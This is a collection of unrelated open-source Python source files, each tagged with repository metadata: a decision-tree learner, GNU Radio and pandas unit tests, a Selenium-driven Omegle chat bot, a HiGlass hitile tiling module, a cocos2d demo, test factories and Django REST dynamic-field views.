labelCounts[currentLabel] += 1
shannonEnt = 0.0
for key in labelCounts:
prob = float(labelCounts[key]) / numEntries
shannonEnt -= prob * log(prob, 2)
return shannonEnt
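# Worked example (illustrative): for the dataset created below, the class
# labels are ['yes', 'yes', 'no', 'no', 'no'], so
#   H = -(2/5)*log2(2/5) - (3/5)*log2(3/5) ~= 0.971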
def createDataSet():
dataSet = [[1, 1, 'yes'], [1, 1, 'yes'],
[1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]
labels = ['no surfacing', 'flippers']
return dataSet, labels
def splitDataSet(dataSet, axis, value):
retDataSet = []
for featVec in dataSet:
if featVec[axis] == value:
reducedFeatVec = featVec[:axis]
reducedFeatVec.extend(featVec[axis + 1:])
retDataSet.append(reducedFeatVec)
return retDataSet
def chooseBestFeatureToSplit(dataSet):
numFeatures = len(dataSet[0]) - 1
baseEntropy = calcShannonEnt(dataSet)
bestInfoGain = 0.0
bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newEntropy = 0.0
for value in uniqueVals:
subDataSet = splitDataSet(dataSet, i, value)
prob = len(subDataSet) / float(len(dataSet))
newEntropy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntropy - newEntropy
if(infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
def majorityCnt(classList):
classCount = {}
for vote in classList:
if vote not in classCount.keys():
classCount[vote] = 0
classCount[vote] += 1
sortedClassCount = sorted(
classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
def createTree(dataSet, labels):
classList = [example[-1] for example in dataSet]
# print('classList.count is :',classList.count(classList[0]))
# print('len(classList) is :',len(classList))
if classList.count(classList[0]) == len(classList):
return classList[0]
# print('len(dataSet[0] is :',len(dataSet[0]))
if len(dataSet[0]) == 1:
return majorityCnt(classList)
bestFeat = chooseBestFeatureToSplit(dataSet)
# print('bestFeat is : ',bestFeat)
bestFeatLabel = labels[bestFeat]
# print('bestFeatLabel is :',bestFeatLabel)
myTree = {bestFeatLabel: {}}
del(labels[bestFeat])
featValues = [example[bestFeat] for example in dataSet]
uniqueVals = set(featValues)
for value in uniqueVals:
subLabels = labels[:]
myTree[bestFeatLabel][value] = createTree(
splitDataSet(dataSet, bestFeat, value), subLabels)
return myTree
def classify(inputTree, featLabels, testVec):
firstStr = list(inputTree.keys())[0]
# print('firstStr is : ',firstStr)
secondDict = inputTree[firstStr]
# print('secondDict is :',secondDict)
featIndex = featLabels.index(firstStr)
# print('featIndex is :',featIndex)
# print(type(featIndex))
for key in secondDict.keys():
# print(key)
# print('testVec is :',testVec[featIndex])
# print(type(key))
# print(type(testVec[featIndex]))
if testVec[featIndex] == key:
if type(secondDict[key]).__name__ == 'dict':
classLabel = classify(secondDict[key], featLabels, testVec)
else:
classLabel = secondDict[key]
return classLabel
def storeTree(inputTree, filename):
fw = open(filename, 'wb')
pickle.dump(inputTree, fw)
fw.close()
def grabTree(filename):
fr = open(filename, 'rb')
return pickle.load(fr)
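# Illustrative usage:
#   myDat, labels = createDataSet()
#   myTree = createTree(myDat, labels[:]) # pass a copy; createTree mutates labels
#   classify(myTree, labels, [1, 0]) # -> 'no'
#   classify(myTree, labels, [1, 1]) # -> 'yes'
#   storeTree(myTree, 'tree.pkl'); myTree = grabTree('tree.pkl')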
| JNero/Machine-Learning-in-action | DicisionTree/trees.py | Python | apache-2.0 | 3,852 | 0.003375 |
#!/usr/bin/env python
#
# Copyright 2005,2007,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, comedi
class test_comedi(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_000_nop(self):
"""Just see if we can import the module...
They may not have COMEDI library, etc. Don't try to run anything"""
pass
if __name__ == '__main__':
gr_unittest.run(test_comedi, "test_comedi.xml")
| iohannez/gnuradio | gr-comedi/python/comedi/qa_comedi.py | Python | gpl-3.0 | 1,256 | 0.001592 |
#
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
from collections import OrderedDict
from sqlalchemy import inspect
from sqlalchemy.engine import ResultProxy
from rdr_service.dao.base_dao import UpsertableDao
from rdr_service.model.resource_data import ResourceData
from rdr_service.resource.fields import EnumString, EnumInteger
class ResourceDataDao(UpsertableDao):
def __init__(self, backup=False):
"""
:param backup: Use backup readonly database connection.
"""
super().__init__(ResourceData, backup=backup)
def to_resource_dict(self, obj, schema=None, result_proxy=None):
"""
Dump a sqlalchemy model or query result object to python dict.
:param obj: SqlAlchemy Query Result object or Row Proxy object.
:param schema: Resource schema object.
:param result_proxy: ResultProxy object if obj=RowProxy object.
:return: ordered dict
"""
if not obj:
return None
data = OrderedDict()
# Get the list of columns returned in the query.
if result_proxy and isinstance(result_proxy, ResultProxy): # this is a ResultProxy object
columns = list()
for column in result_proxy.cursor.description:
columns.append(column[0])
elif hasattr(obj, "_fields"): # This is a custom query result object.
columns = obj._fields
elif hasattr(obj, '_keymap'): # RowProxy
columns = obj._keymap
else:
mapper = inspect(obj) # Simple model object
columns = mapper.attrs
for column in columns:
key = str(column.key) if hasattr(column, "key") else column
if not isinstance(key, str):
# logging.warning('bad column key value [{0}], unable to lookup result column value.'.format(column))
continue
value = getattr(obj, key)
int_id_value = None
if schema:
# Check for Enum column type and convert to Enum if needed.
_field = schema.get_field(key)
if type(_field) == EnumString:
value = str(_field.enum(value))
_id_field = schema.get_field(key + '_id')
if _id_field and type(_id_field) == EnumInteger:
int_id_value = int(_field.enum(value))
elif type(_field) == EnumInteger:
value = int(_field.enum(value))
data[key] = value
# Automatically generate an integer field for enum/string fields that have a paired _id integer field
# E.g.: status/status_id, code_type/code_type_id, etc.
if int_id_value:
data[key + '_id'] = int_id_value
return data
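# Illustrative note (hypothetical field names): for a schema whose `status`
# field is an EnumString paired with a `status_id` EnumInteger, the loop above
# emits both the enum's name under 'status' and its integer value under
# 'status_id' automatically.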
| all-of-us/raw-data-repository | rdr_service/dao/resource_dao.py | Python | bsd-3-clause | 2,900 | 0.001034 |
import unittest
from datetime import datetime
import numpy as np
import pandas as pd
from excel_helper.helper import DataSeriesLoader
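# The CAGR expectation asserted below (illustrative): a value growing at
# annual rate r for m months scales by (1 + r) ** (m / 12), so 10% growth
# over three months gives 1.1 ** (3 / 12).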
class TestDataFrameWithCAGRCalculation(unittest.TestCase):
def test_simple_CAGR(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
print (res)
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_within_bounds(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_before_start(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_before_start')
def test_CAGR_ref_date_after_end(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_after_end')
def test_simple_CAGR_from_pandas(self):
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
xls = pd.ExcelFile('test.xlsx')
df = xls.parse('Sheet1')
ldr = DataSeriesLoader.from_dataframe(df, times, size=2)
res = ldr['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_simple_CAGR_mm(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2015-01-01', '2016-01-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['mm']
print(res)
# assert res.loc[[datetime(2009, 1, 1)]][0] == 1
# assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
if __name__ == '__main__':
unittest.main()
| dschien/PyExcelModelingHelper | tests/test_DataSeriesLoader.py | Python | mit | 3,547 | 0.003383 |
'''
View the coding live on Twitch @ https://www.twitch.tv/gmangavin and look at the github @ https://github.com/gmangavin/PyWeb
chromedriver for gui view, phantomjs for ghost view.
'''
import selenium.webdriver #Imports module
import time #Imports time
import threading #Imports threading, used to have multiple things happen at the same time.
import os #Imports OS
N = False #Used for the bool loop.
while N == False:
EngineChoice = input('Would you like a visual of the bot? (Y/N): ') #Part one for the web driver choice
YN = (EngineChoice.lower()) #Prevents capatalization error.
if YN == ('y'):
while N == False:
VarChoice = input('Would you like Firefox or Chrome? (F/C): ') #Part two for the web driver choice
FC = (VarChoice.lower()) #Prevents capatalization error.
if FC == ('f'):
try:
WebVar = selenium.webdriver.Firefox()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the firefox webdriver installed. You can get it here https://github.com/mozilla/geckodriver/releases")
elif FC == ('c'):
try:
WebVar = selenium.webdriver.Chrome()
N = True
except:
print("You don't seem to have the chrome webdriver installed. You can get it here https://sites.google.com/a/chromium.org/chromedriver/downloads")
else:
print('Try again')
elif YN == ('n'):
try:
WebVar = selenium.webdriver.PhantomJS()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the PhantomJS webdriver installed. You can get it here http://phantomjs.org/")
else:
print('Try again')
#A while loop to make sure the user enters in a correct character.
#Allows the user to choose which web driver they want to use.
Interest = input("What is a common interest you're looking for?: ")
WebVar.get('https://www.omegle.com')
print(WebVar.title)
WebVar.find_element_by_xpath('//*[@id="topicsettingscontainer"]/div/div[1]/span[2]').click() #Clicks the area for typing
Send = WebVar.find_element_by_class_name('newtopicinput') #Creates an input variable for text area.
Send.send_keys(Interest + ',') #Sends input to text area.
WebVar.find_element_by_xpath('//*[@id="textbtn"]').click() #Clicks the 'text' button
Disconnected = False
def Disconnect(*args):
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
global Disconnected
Disconnected = True
return Disconnected
def Change(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div/div[4]/div/a').click()
Interest = input("What is a common interest you're looking for?: ")
Send2 = WebVar.find_element_by_class_name('topicplaceholder')
Send2.send_keys(Interest + ',') #Sends input to text area.
else:
print("You need to disconnect first")
def Connect(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
os.system('cls')
print('Rebooting search.')
        # NOTE: Thread._stop() is a private CPython method; calling it on a
        # freshly constructed Thread object does not stop the threads that
        # are already running, so the old threads are simply abandoned here.
        threading.Thread(target=StatusMode)._stop()
        threading.Thread(target=UserMode)._stop()
time.sleep(1)
threading.Thread(target=StatusMode).start()
os.system('cls')
elif Disconnected == False:
print("You're still connected.")
else:
print("something is just broken")
def UserMode(*args):
while True:
UserM = input('') #Has the user type an interest.
if UserM == "/end":
Disconnect()
elif UserM == "/start":
Connect()
elif UserM == "/change":
Change()
else:
Sending = WebVar.find_element_by_class_name('chatmsg') #Takes the class used for user input.
Sending.send_keys(UserM)
WebVar.find_element_by_class_name('sendbtn').click()
def StatusMode(*args):
threading.Thread(target=UserMode).start() #Starts the operation in a thread.
StatusNew = None #Create a variable with no value.
while True:
Status = WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div').text #Takes the text info from xpath
if StatusNew == (Status):
continue
else:
StatusNew = Status
if "Stranger has disconnected." not in Status:
os.system('cls') #Refreshes chat.
print(StatusNew)
print('')
else:
Disconnect()
threading.Thread(target=StatusMode).start() #Starts the operation in a thread. | gmangavin/PyMegle | Other Py/PyMegleTwo.py | Python | mit | 5,053 | 0.014843 |
import base64
import h5py
import math
import numpy as np
import os
import os.path as op
def array_to_hitile(
old_data, filename, zoom_step=8, chunks=(1e6,), agg_function=np.sum
):
"""
Downsample a dataset so that it's compatible with HiGlass (filetype: hitile, datatype: vector)
Parameters
----------
old_data: np.array
A numpy array containing the data to be downsampled
filename: string
The output filename where the resulting multi-resolution
data will be stored.
zoom_step: int
The number of zoom levels to skip when aggregating
"""
import dask.array as da
if op.exists(filename):
os.remove(filename)
f_new = h5py.File(filename, "w")
tile_size = 1024
max_pos = len(old_data)
# we store every n'th zoom level
zoom_factor = 2 ** zoom_step
max_zoom = math.ceil(math.log(max_pos / tile_size) / math.log(2))
meta = f_new.create_dataset("meta", (1,), dtype="f")
meta.attrs["tile-size"] = tile_size
meta.attrs["zoom-step"] = zoom_step
meta.attrs["max-length"] = max_pos
meta.attrs["max-zoom"] = max_zoom
meta.attrs["max-width"] = tile_size * 2 ** max_zoom
min_data = da.from_array(old_data, chunks)
max_data = da.from_array(old_data, chunks)
old_data = da.from_array(old_data, chunks)
for z in range(0, max_zoom, zoom_step):
values_dset = f_new.require_dataset(
"values_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
mins_dset = f_new.require_dataset(
"mins_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
maxs_dset = f_new.require_dataset(
"maxs_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
da.store(old_data, values_dset)
da.store(min_data, mins_dset)
da.store(max_data, maxs_dset)
# f_new['values_' + str(z)][:] = old_data
# see if we need to pad the end of the dataset
# if so, use the previous last value
if len(old_data) % zoom_factor != 0:
old_data = da.concatenate(
(old_data, [old_data[-1]] * (zoom_factor - len(old_data) % zoom_factor))
)
            min_data = da.concatenate(
                (min_data, [min_data[-1]] * (zoom_factor - len(min_data) % zoom_factor))
            )
max_data = da.concatenate(
(max_data, [max_data[-1]] * (zoom_factor - len(max_data) % zoom_factor))
)
# aggregate the data by summing adjacent datapoints
# sys.stdout.write('summing...')
# sys.stdout.flush()
# print("fdsdsfs:", math.ceil(len(old_data) / zoom_factor), zoom_factor)
# print("chunks:", chunks, zoom_factor, 'len:', len(old_data))
        old_data = old_data.rechunk(chunks)
        min_data = min_data.rechunk(chunks)
        max_data = max_data.rechunk(chunks)
# print('zoom_factor', zoom_factor, old_data.shape)
old_data = da.coarsen(agg_function, old_data, {0: zoom_factor})
        min_data = da.coarsen(np.min, min_data, {0: zoom_factor})
max_data = da.coarsen(np.max, max_data, {0: zoom_factor})
# reshape( (math.ceil(len(old_data) / zoom_factor), zoom_factor)).sum(axis=1)
# sys.stdout.write(' done\n')
# sys.stdout.flush()
"""
if len(old_data) < 10000:
plt.plot(old_data)
"""
# plt.plot(old_data)
f_new.close()
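# A minimal usage sketch (illustrative only; 'example.hitile' is a
# hypothetical output path, not part of this module):
#
#     data = np.random.rand(2 ** 20)
#     array_to_hitile(data, 'example.hitile', zoom_step=8)
#     with h5py.File('example.hitile', 'r') as f:
#         dense, mins, maxs = get_data(f, 0, 0)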
def aggregate(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).sum(axis=1)
def aggregate_min(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).min(axis=1)
def aggregate_max(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).max(axis=1)
def get_data(hdf_file, z, x):
"""
Return a tile from an hdf_file.
:param hdf_file: A file handle for an HDF5 file (h5py.File('...'))
:param z: The zoom level
:param x: The x position of the tile
"""
    # is the tile within the range of possible tiles
if x > 2 ** z:
print("OUT OF RIGHT RANGE")
return ([], [], [])
if x < 0:
print("OUT OF LEFT RANGE")
return ([], [], [])
d = hdf_file["meta"]
tile_size = int(d.attrs["tile-size"])
zoom_step = int(d.attrs["zoom-step"])
max_zoom = int(d.attrs["max-zoom"])
max_width = tile_size * 2 ** max_zoom
if "max-position" in d.attrs:
max_position = int(d.attrs["max-position"])
else:
max_position = max_width
rz = max_zoom - z
# tile_width = max_width / 2**z
    # because we only store a subsection of the zoom levels
next_stored_zoom = zoom_step * math.floor(rz / zoom_step)
zoom_offset = rz - next_stored_zoom
# the number of entries to aggregate for each new value
num_to_agg = 2 ** zoom_offset
total_in_length = tile_size * num_to_agg
# which positions we need to retrieve in order to dynamically aggregate
start_pos = int((x * 2 ** zoom_offset * tile_size))
end_pos = int(start_pos + total_in_length)
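    # worked example (illustrative): with max_zoom = 10, zoom_step = 8 and a
    # request at z = 5, rz = 5, so next_stored_zoom = 0 and zoom_offset = 5;
    # num_to_agg = 2 ** 5 = 32 raw values are then folded into each of the
    # 1024 output bins, i.e. total_in_length = 32768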
# print("max_position:", max_position)
max_position = int(max_position / 2 ** next_stored_zoom)
# print("new max_position:", max_position)
# print("start_pos:", start_pos)
# print("end_pos:", end_pos)
# print("next_stored_zoom", next_stored_zoom)
# print("max_position:", int(max_position))
f = hdf_file["values_" + str(int(next_stored_zoom))]
f_min = hdf_file["mins_" + str(int(next_stored_zoom))]
f_max = hdf_file["maxs_" + str(int(next_stored_zoom))]
if start_pos > max_position:
# we want a tile that's after the last bit of data
a = np.zeros(end_pos - start_pos)
a.fill(np.nan)
        a_min = np.zeros(end_pos - start_pos)
        a_min.fill(np.nan)
        a_max = np.zeros(end_pos - start_pos)
        a_max.fill(np.nan)
        # the tile lies entirely past the data, so every value is NaN
        ret_array = aggregate(a, int(num_to_agg))
        min_array = aggregate_min(a_min, int(num_to_agg))
        max_array = aggregate_max(a_max, int(num_to_agg))
elif start_pos < max_position and max_position < end_pos:
a = f[start_pos:end_pos][:]
a[max_position + 1 : end_pos] = np.nan
a_min = f_min[start_pos:end_pos][:]
a_min[max_position + 1 : end_pos] = np.nan
a_max = f_max[start_pos:end_pos][:]
a_max[max_position + 1 : end_pos] = np.nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
max_array = aggregate_max(a_max, int(num_to_agg))
else:
ret_array = aggregate(f[start_pos:end_pos], int(num_to_agg))
min_array = aggregate_min(f_min[start_pos:end_pos], int(num_to_agg))
max_array = aggregate_max(f_max[start_pos:end_pos], int(num_to_agg))
# print("ret_array:", f[start_pos:end_pos])
# print('ret_array:', ret_array)
# print('nansum', np.nansum(ret_array))
# check to see if we counted the number of NaN values in the given
# interval
f_nan = None
if "nan_values_" + str(int(next_stored_zoom)) in hdf_file:
f_nan = hdf_file["nan_values_" + str(int(next_stored_zoom))]
nan_array = aggregate(f_nan[start_pos:end_pos], int(num_to_agg))
num_aggregated = 2 ** (max_zoom - z)
num_vals_array = np.zeros(len(nan_array))
num_vals_array.fill(num_aggregated)
num_summed_array = num_vals_array - nan_array
averages_array = ret_array / num_summed_array
return (averages_array, min_array, max_array)
return (ret_array, min_array, max_array)
def tileset_info(hitile_path):
"""
Get the tileset info for a hitile file.
Parameters
----------
hitile_path: string
The path to the hitile file
Returns
-------
tileset_info: {'min_pos': [],
'max_pos': [],
'tile_size': 1024,
'max_zoom': 7
}
"""
hdf_file = h5py.File(hitile_path, "r")
d = hdf_file["meta"]
if "min-pos" in d.attrs:
min_pos = d.attrs["min-pos"]
else:
min_pos = 0
if "max-pos" in d.attrs:
max_pos = d.attrs["max-pos"]
else:
max_pos = d.attrs["max-length"]
return {
"max_pos": [int(max_pos)],
"min_pos": [int(min_pos)],
"max_width": 2 ** math.ceil(math.log(max_pos - min_pos) / math.log(2)),
"max_zoom": int(d.attrs["max-zoom"]),
"tile_size": int(d.attrs["tile-size"]),
}
def tiles(filepath, tile_ids):
"""
Generate tiles from a hitile file.
Parameters
----------
tileset: tilesets.models.Tileset object
The tileset that the tile ids should be retrieved from
tile_ids: [str,...]
A list of tile_ids (e.g. xyx.0.0) identifying the tiles
to be retrieved
Returns
-------
tile_list: [(tile_id, tile_data),...]
A list of tile_id, tile_data tuples
"""
generated_tiles = []
for tile_id in tile_ids:
tile_id_parts = tile_id.split(".")
tile_position = list(map(int, tile_id_parts[1:3]))
(dense, mins, maxs) = get_data(
            h5py.File(filepath, "r"), tile_position[0], tile_position[1]
)
"""
if len(dense):
max_dense = max(dense)
min_dense = min(dense)
else:
max_dense = 0
min_dense = 0
has_nan = len([d for d in dense if np.isnan(d)]) > 0
if (
not has_nan and
max_dense > min_f16 and max_dense < max_f16 and
min_dense > min_f16 and min_dense < max_f16
):
tile_value = {
'dense': base64.b64encode(dense.astype('float16')).decode('utf-8'),
'mins': base64.b64encode(mins.astype('float16')).decode('utf-8'),
'maxs': base64.b64encode(mins.astype('float16')).decode('utf-8'),
'dtype': 'float16'
}
else:
"""
tile_value = {
"dense": base64.b64encode(dense.astype("float32")).decode("utf-8"),
"mins": base64.b64encode(mins.astype("float32")).decode("utf-8"),
"maxs": base64.b64encode(maxs.astype("float32")).decode("utf-8"),
"dtype": "float32",
}
generated_tiles += [(tile_id, tile_value)]
return generated_tiles
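# Example (illustrative): tile ids take the form '<tileset-uuid>.<z>.<x>'
# (the uuid itself must not contain dots), so a call such as
#
#     tiles('example.hitile', ['my-uuid.0.0', 'my-uuid.1.1'])
#
# yields a list of (tile_id, tile_value) pairs where each tile_value holds
# base64-encoded float32 'dense', 'mins' and 'maxs' arrays.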
| hms-dbmi/clodius | clodius/tiles/hitile.py | Python | mit | 10,847 | 0.001106 |
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 5, s, t 10.1, s, t 10.2, s, q"
tags = "spawn, Reverse"
import cocos
from cocos.director import director
from cocos.actions import Rotate, Reverse, MoveBy, Delay
import pyglet
from cocos.sprite import Sprite
class TestLayer(cocos.layer.Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x,y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x/2, y/2) )
self.add( self.sprite )
self.sprite2 = Sprite( 'grossini.png', (x/2, y/4) )
self.add( self.sprite2 )
seq = Rotate( 360, 10 ) | MoveBy((x/2,0))
self.sprite.do( seq )
self.sprite2.do( Reverse( seq ) )
def main():
director.init()
test_layer = TestLayer ()
main_scene = cocos.scene.Scene (test_layer)
director.run (main_scene)
if __name__ == '__main__':
main()
| eevee/cocos2d-mirror | test/test_spawn.py | Python | bsd-3-clause | 1,024 | 0.030273 |
import factory
from api import models
class ClientFactory(factory.DjangoModelFactory):
class Meta:
model = models.Client
name = 'Coaxis'
@factory.django.mute_signals(models.post_save)
class UserFactory(factory.DjangoModelFactory):
class Meta:
model = models.MyUser
email = factory.Sequence(lambda n: 'u{0}@coaxis.com'.format(n))
password = factory.PostGenerationMethodCall('set_password', 'password')
is_staff = False
class EmployeeFactory(factory.DjangoModelFactory):
class Meta:
model = models.Employee
user = factory.SubFactory(UserFactory)
is_technician = False
@factory.post_generation
def clients(self, create, extracted, **kwargs):
if not create: # Simple build, do nothing.
return
if extracted: # A list of objects were passed in, use them
for client in extracted:
self.clients.add(client)
class TechnicianFactory(EmployeeFactory):
is_technician = True
class DaemonFactory(factory.DjangoModelFactory):
class Meta:
model = models.Daemon
client = factory.SubFactory(ClientFactory)
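# A minimal usage sketch (illustrative, e.g. inside a test case):
#
#     client = ClientFactory()
#     technician = TechnicianFactory(clients=[client])
#     daemon = DaemonFactory(client=client)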
| Coaxis-ASP/opt | backend/api/tests/factories.py | Python | gpl-3.0 | 1,150 | 0 |
import copy
from django.db.models.fields.related import ForeignKey, OneToOneField
from rest_framework import mixins
from rest_framework.generics import (
GenericAPIView, ListAPIView, ListCreateAPIView, RetrieveAPIView,
RetrieveUpdateDestroyAPIView
)
from api.generics.serializers import (
DynamicFieldsModelSerializer, DynamicFieldsSerializer
)
class DynamicView(GenericAPIView):
# foreign / one-to-one fields that can be used with select_related()
select_related_fields = []
serializer_fields = []
field_source_mapping = {}
fields = ()
selectable_fields = ()
def __init__(self, *args, **kwargs):
"""
Extract prefetches and default fields from Meta
"""
# TODO: move this to a meta class, to evaluate once when defining the
# class
# TODO: This is not efficient - 2016-01-20
serializer_class = self.get_serializer_class()
serializer = serializer_class() # need an instance to extract fields
model = serializer_class.Meta.model
assert issubclass(
serializer_class, DynamicFieldsModelSerializer
) or issubclass(serializer_class, DynamicFieldsSerializer), (
"serializer class must be an instance of \
DynamicFieldsModelSerializer " "instead got %s"
) % (serializer_class.__name__,)
self.serializer_fields = serializer.fields.keys()
self.select_related_fields = [
field.name for field in model._meta.fields
if isinstance(field, (ForeignKey, OneToOneField))
]
self.field_source_mapping = {
field.field_name: field.source
for field in serializer.fields.values()
if isinstance(
field, (ForeignKey, OneToOneField)
)
}
def _get_query_fields(self):
if not self.request:
return ()
request_fields = self.request.query_params.get('fields')
# if requested query fields is set to `all` we will return all
# serializer fields defined in serializer class. Here we assign
# `self.fields = ()` so that it will be assigned all serializer
# fields in `filter_queryset` method.
if request_fields and request_fields == 'all':
self.fields = ()
self.selectable_fields = (self.selectable_fields + tuple(
self.serializer_fields))
elif request_fields:
for request_field in request_fields.split(','):
if request_field not in list(self.fields):
# put selectable fields together with required fields
# defined in the class
self.fields = self.fields + (request_field,)
# just in case if you want to know which of fields
# we get as selectable field
self.selectable_fields = self.selectable_fields+(request_field,) # NOQA: E501
# Some bugs if request fields has 'aggregations'
# So we need to remove it from request fields.
# And assign a tuple fields without aggregations
fields = list(self.fields)
try:
fields.remove('aggregations')
except ValueError:
pass
# Assign it again
self.fields = tuple(fields)
return getattr(self, 'fields', ())
def filter_queryset(self, queryset, *args, **kwargs):
"""
Prefetches based on 'fields' GET arg
"""
filter_fields = copy.deepcopy(self.request.query_params)
if 'fields' in filter_fields:
filter_fields.pop('fields')
if 'format' in filter_fields:
filter_fields.pop('format')
if 'page' in filter_fields:
filter_fields.pop('page')
if 'page_size' in filter_fields:
filter_fields.pop('page_size')
if 'ordering' in filter_fields:
filter_fields.pop('ordering')
        if 'q' in filter_fields:
filter_fields.pop('q')
if 'q_fields' in filter_fields:
filter_fields.pop('q_fields')
for filter_field in filter_fields:
found = False
try:
declared_filters = self.filter_class.declared_filters
for key in declared_filters:
if filter_field == key:
found = True
if found is False:
# make error in the code to fail
# if input wrong filter name.
setattr(self, 'filter_class', 'No Filter Class')
break
except AttributeError:
pass
fields = self._get_query_fields(*args, **kwargs)
if not fields:
fields = self.serializer_fields
select_related_fields = list(set(
self.select_related_fields
) & set(fields))
if select_related_fields:
queryset = queryset.select_related(*select_related_fields)
for field in fields:
# TODO: Hook this up in the view - 2016-01-15
if hasattr(queryset, 'prefetch_%s' % field):
queryset = getattr(queryset, 'prefetch_%s' % field)()
queryset = super(DynamicView, self).filter_queryset(
queryset, *args, **kwargs
)
return queryset
def get_serializer(self, *args, **kwargs):
"""
Apply 'fields' to dynamic fields serializer
"""
fields = self._get_query_fields()
kwargs['context'] = self.get_serializer_context()
return super(DynamicView, self).get_serializer(
fields=fields, *args, **kwargs
)
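# Example (illustrative): a request such as GET /some-endpoint/?fields=id,name
# serializes only those fields plus any fields the view itself declares as
# required, while ?fields=all exposes every field defined on the serializer.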
class DynamicListView(DynamicView, ListAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailView(DynamicView, RetrieveAPIView):
"""
List view with dynamic properties
"""
class DynamicListCRUDView(DynamicView, ListCreateAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailCRUDView(DynamicView, RetrieveUpdateDestroyAPIView):
"""
List view with dynamic properties
"""
class SaveAllSerializer(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.CreateModelMixin,
GenericAPIView):
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
